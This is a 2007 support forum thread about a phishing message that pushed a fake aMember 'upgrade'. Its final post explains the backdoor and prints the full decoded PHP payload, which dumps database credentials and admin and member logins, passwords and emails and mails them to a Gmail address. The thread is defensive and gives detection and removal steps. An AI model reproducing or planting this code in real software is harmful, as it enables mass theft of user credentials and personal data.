Servicebot sending PM Upgrades?

Discussion in 'Installation' started by eleven, Oct 22, 2007.

  1. eleven

    eleven aMember Pro Customer

    Joined:
    Jan 28, 2006
    Messages:
    38
    Is this legit?
    I got a PM with an upgrade link..

    amember-downloads.com/

    This seems like a scam?

    The upgrade file is totally different then what I got from inside my members account.
  2. lavella

    lavella New Member

    Joined:
    Apr 19, 2007
    Messages:
    29
    I got one aswell... Doesnt seem to be the normal way that Alex usually sends out updates... Not going to download and update.

    Anyone else get this?
  3. CrackBaby

    CrackBaby Member

    Joined:
    Aug 22, 2006
    Messages:
    154
    I got it but I am not going to get that from that link I always download from my members page.

    The message looks legit as for that to pop like that the script would be in alex's webpages.

    On the other hand why would alex ask us to download from download.com?

    To me that is not right since you have to pay for updates
  4. jenolan

    jenolan aMember Coder

    Joined:
    Nov 3, 2006
    Messages:
    510
    Doesn't seem to be I did a compare of the files, all the changes are rubbish.

    Might be an attempt to insert bodgey files later .. I would wait to hear from Alex.
  5. alexander

    alexander Administrator Staff Member

    Joined:
    Jan 8, 2003
    Messages:
    6,279
    Yes this is SCAM
    We don't send security updates this way. Please disregard that message.
    PM service has been disabled temporarily
  6. kel

    kel aMember Pro Customer

    Joined:
    May 20, 2004
    Messages:
    16
    Warning

    I did a WHOIS lookup of that domain, the site has a private registrant. It's definitely not amember.com or cgi-central.net.

    This looks like a targeted phishing attempt... BE WARNED EVERYBODY, it looks dangerous to install these files.
  7. jake07

    jake07 New Member

    Joined:
    Oct 5, 2007
    Messages:
    4
    Why didn't you send an email telling people it is scam??? I thought it was real and uploaded the files....luckily the new files were there for just 3 minutes... and then I reloaded from backup files. (There is an extra file functions.php which must be deleted.)

    You should send an email to everyone and post a warning in eh forum...

    If I had not read the forum today, I won't have known the PM was a fake.
  8. duane

    duane New Member

    Joined:
    May 27, 2007
    Messages:
    1
    I did the same as jake07. An email advising all users of this would have been most helpful!
  9. mrcd

    mrcd New Member

    Joined:
    Aug 22, 2006
    Messages:
    1
    Luckily I see so much spam I never download updates directly from an email.

    So upon checking my PM box here, I noticed the original message was deleted. And then I went to this thread.

    Glad my cynical attitude was right this time. I'd be more than happy to sign up for a customer-only notification list where you could contact me with legitimate updates or scam warnings.
  10. jenolan

    jenolan aMember Coder

    Joined:
    Nov 3, 2006
    Messages:
    510
    Unless you expect someone to be online 24/7 they can't advise you it is a scan before they see the thing. Alex did email everyone probably as soon as he saw it and as fast as he could type it.
  11. lasvegasextremes

    lasvegasextremes New Member

    Joined:
    May 7, 2007
    Messages:
    3
    thanks goodness for the email advisement.

    i overlooked the domain name it came from and downloaded it to my desktop and was gonna install when i had the chance to open it.

    i thought it was just a newer efficient method to reach everyone with an account.
  12. laburke

    laburke New Member

    Joined:
    Jun 13, 2007
    Messages:
    5
    I appreciate the e-mail warning. I too was going to install the PM update when I had time. And I thought I was good at detecting scams. I didn't even think twice about it. Something must be wrong with my scam detector neurons...but anyway, thanks for letting us know!
  13. eleven

    eleven aMember Pro Customer

    Joined:
    Jan 28, 2006
    Messages:
    38
    Man..

    THat sucks.

    Alex an amember do a great job..

    This was somebody that clearly slipped under the radar.

    Do scammers have really nothing better to do?
  14. getresults

    getresults Member

    Joined:
    Nov 1, 2006
    Messages:
    87
    CRITICAL WARNING - The PM scam completely compromises your database!

    URGENT - READ THIS IMMEDIATELY!

    If you installed the bogus update contained in the PM update scam then your entire Amember database (all admin user and member details) have been completely compromised!

    I'm really surprised not to see more threads about this bogus update email sent a couple of weeks ago.

    I now wish I'd logged into the forum sooner but I've been incredibly busy and assumed someone else would have clearly posted about this hack.

    I also received the PM with the "security notice" and downloaded the update from amember-downloads.com.

    This is an attack that will compromise your amember member database if you downloaded and installed the "update".

    I have to admit it was a cleverly thought out attack as I didn't stop to question the domain name or that it might not be real.

    Here's what happens if you install this bogus update.

    What the attack does is add an extra file called functions.php in the main directory that is executed when someone logs into Amember by accessing the login.php page.

    functions.php includes a hidden, encoded function which extracts the username and passwords of your admin users from the database and also the member id, username, password, email address, first name and last name of every member in your database.

    All of those details are then emailed to a gmail email address.

    So if anyone reading this patched their copy of amember with the bogus patch then your database has completely compromised.

    At the very least you need to change all of your admin passwords immediately.

    It would also be a good idea to notify your members to change all their passwords as well.

    If you're not sure if you updated the patch or not, look in the directory where amember is installed and look for a file called functions.php. If you see that file and view it, you'll find that it is mostly filled with empty lines. On line 841 you will see an encoded function (it looks like gibberish) that starts with:

    base64_decode('ZXZhbChiY ...

    This is the function that copies all your database details and emails it to the gmail address.

    To remove this attack you must delete the functions.php file.

    You must also edit login.php, go to line 21 and delete the line:

    include('./functions.php');

    This prevents login.php from trying to load and execute functions.php.

    The key lesson here is to NEVER, EVER trust an Amember security update that is sent via a PM - just as Alex said.

    I really hope this hasn't affected too many Amember owners.

    Here is the decoded php code from functions.php:

    Code:
    @include_once('config.inc.php');
    
    $sql_data = "db=$pc[db] \nuser=$pc[user] \npass=$pc[pass] \nhost=$pc[host] \n";
    $host = "server=$_SERVER[HOST] \npath=$_SERVER[SCRIPT_NAME] \n ";
    
    $sql = @mysql_pconnect($pc[host], $pc[user], $pc[pass]);
    @mysql_select_db($pc[db]);
    
    $site = '';
    $result = @mysql_query('SELECT `value` FROM `'.$pc['prefix'].'config` WHERE `name` = "root_url" LIMIT 1');
    while($row = mysql_fetch_assoc($result)){
    $site = $row['value'];
    }
    
    
    $admins = "ADMINS:\n";
    $result = @mysql_query('SELECT `admin_id`,`login`,`pass` FROM `'.$pc['prefix'].'admins`');
    while($row = mysql_fetch_assoc($result)){
    $admins .= "$row[admin_id] $row[login] $row[pass]\n";
    }
    
    $members = "MEMBERS:\n";
    $result = @mysql_query('SELECT `member_id`,`login`,`pass`,`email`,`name_f`,`name_l` FROM `'.$pc['prefix'].'members');
    while($row = mysql_fetch_assoc($result)){
    $members .= "$row[member_id] $row[login] $row[pass] $row[email] $row[name_f] $row[name_l]\n";
    }
    
    @mysql_close($sql);
    
    $final_data = $sql_data."\n".$host."\n".$admins."\n".$members;
    $final_data = base64_encode($final_data);
    
    $sent_times = @file('data\errorlog.txt');
    $sent_times = (int)$sent_times[0];
    if ($sent_times < 5) {
    @mail('amemberdump@gmail.com', $site, $final_data);
    
    $sent_times++;
    $fd = @fopen ('data\errorlog.txt', "w+");
    @fputs($fd, $sent_times++);
    @fclose ($fd);
    }
    
    if (isset($_GET['print'])){
    die($final_data);
    }
    

Share This Page